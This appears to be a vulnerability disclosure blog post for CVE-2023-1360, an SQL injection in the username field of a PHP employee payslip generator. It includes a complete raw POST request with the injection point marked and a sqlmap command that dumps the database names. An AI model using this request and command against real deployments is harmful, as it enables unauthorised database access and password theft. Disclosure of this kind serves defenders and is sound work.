Headline
CVE-2023-1360: SQL Injection in Employee Payslip Generator System 1.2.0 – 0xgabe Blog
A vulnerability was found in SourceCodester Employee Payslip Generator with Sending Mail 1.2.0 and classified as critical. This issue affects some unknown processing of the file classes/Users.php?f=save of the component New User Creation. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222863.
****What is Employee Payslip Generator System?****
The Employee Payslip Generator System is a PHP Project. The system was developed for a particular company and allows the management to easily calculate the company’s employee payroll and generate a PDF payslip. It has a feature to send the generated payslip to their employees’ email. The generated payslip is encrypted and the password will be provided only to employees. To learn more about the system, visit the Employees Pay Slip PDF Generator System with Email using the PHP/OOP Free Source Code article on this site.
Software vendor: https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html
Impact
An attacker authenticated as an administrator can inject SQL commands when creating new users, which may lead to password leaks.
The vulnerability
It was possible to inject SQL commands at least at one point in the application, more specifically in the username parameter. The following image demonstrates the error message displayed when entering a single quote:
Looking at the source code of the application, more specifically at the “Users.php” file, we can see that on line 25 a database query is performed, passing the value directly, without any filter.
The following image illustrates the fact:
It was possible to exploit the vulnerability by using the Boolean-Based Blind method. To speed up the exploration process, just use the following request and the SQLMap tool.
POST /php-pess/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 771
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAaG6PbmNS0LS6zmB
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=6d2i5btkbanj3dkr5a127ctsfs
Connection: close
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="firstname"
User
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="lastname"
guest
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="username"
*
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="password"
random
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="type"
1
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryAaG6PbmNS0LS6zmB--
Now with SQLMap use the following command, where the previously mentioned request will be used, using the Boolean-Based Blind exploration and finally collecting the databases.
python3 sqlmap.py -r file.txt --technique="B" --dbs
As a result, we have the database is collected. The following image demonstrates this fact:
References
https://portswigger.net/web-security/sql-injection
https://owasp.org/www-community/attacks/SQL_Injection